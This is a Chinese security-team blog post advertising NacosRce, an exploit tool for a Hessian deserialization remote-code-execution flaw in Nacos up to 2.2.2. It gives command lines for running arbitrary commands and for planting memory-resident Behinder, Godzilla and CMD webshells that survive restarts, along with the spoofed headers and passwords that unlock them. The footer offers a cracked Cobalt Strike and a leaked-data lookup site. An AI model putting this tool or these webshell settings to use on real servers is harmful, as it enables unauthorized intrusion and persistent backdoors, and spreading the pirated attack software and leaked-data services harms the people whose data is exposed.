查看原文
其他

Nacos Hessian 反序列化漏洞利用工具

刨洞安全团队 刨洞安全团队 2023-11-08

开局先放一张图


使用方式

自动注入内存马并执行命令:

模板:
java -jar NacosRce.jar Url Jraft端口 "Command"

示例:
java -jar NacosRce.jar http://192.168.90.1:8848/nacos  7848 "whoami"

只注入内存马:

java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell


冰蝎内存马

1、需要设置请求头x-client-data:rebeyond
2、设置Referer:https://www.google.com/
3、路径随意
4、密码rebeyond


哥斯拉内存马

1、需要设置请求头x-client-data:godzilla
2、设置Referer:https://www.google.com/
3、路径随意
4、密码是pass 和 key


CMD内存马

1、需要设置请求头x-client-data:cmd
2、设置Referer:https://www.google.com/
3、请求头cmd:要执行的命令

v0.5 版本实现了:

1、不出网漏洞利用
2、可多次发起漏洞利用
3、同时注入冰蝎/哥斯拉/CMD内存马
4、内存马对nacos多版本进行了兼容

tips:
1、请用jdk1.8
2、适用于 Nacos 2.x <= 2.2.2
3、非集群的也能打哦
4、此内存马重启nacos依然存活


关于Windows

如用下面的方式执行,注入内存马时会生成临时文件 C:\Windows\Temp\nacos_data_temp 和 C:\Windows\Temp\nacos_data_temp.class 文件

java -jar NacosRce.jar http://192.168.90.1:8848 7848 "whoami" windows

如果没有在最后加 windows,临时文件会在 /tmp/nacos_data_temp /tmp/nacos_data_temp.class,所以权限足够的话,不指定 windows 也能打成功

windows 没打成功也许是因为没权限操作 C盘 或其他原因


项目地址(欢迎Star,0.5版暂时需要自己编译):

https://github.com/c0olw/NacosRce


关注公众号后台回复 0001 领取域渗透思维导图,0002 领取VMware 17永久激活码,0003 获取SGK地址,0004 获取在线ChatGPT地址,0005 获取 Windows10渗透集成环境,0006 获取 CobaltStrike 4.8破解版


加我微信好友,邀请你进交流群





往期推荐



腾讯QQ/TIM本地特权提升(CVE-2023-34312)

某CDN疑似被投毒!

某ehr-sql注入漏洞利用GetShell

RdViewer远控隐蔽利用及钓鱼攻击

微信小程序Mac版抓包

iVMS-8700综合安防管理平台代码审计

记一次从外网到拿下域控

红队标准手册

可能要被封号了!

备用号,欢迎关注


继续滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存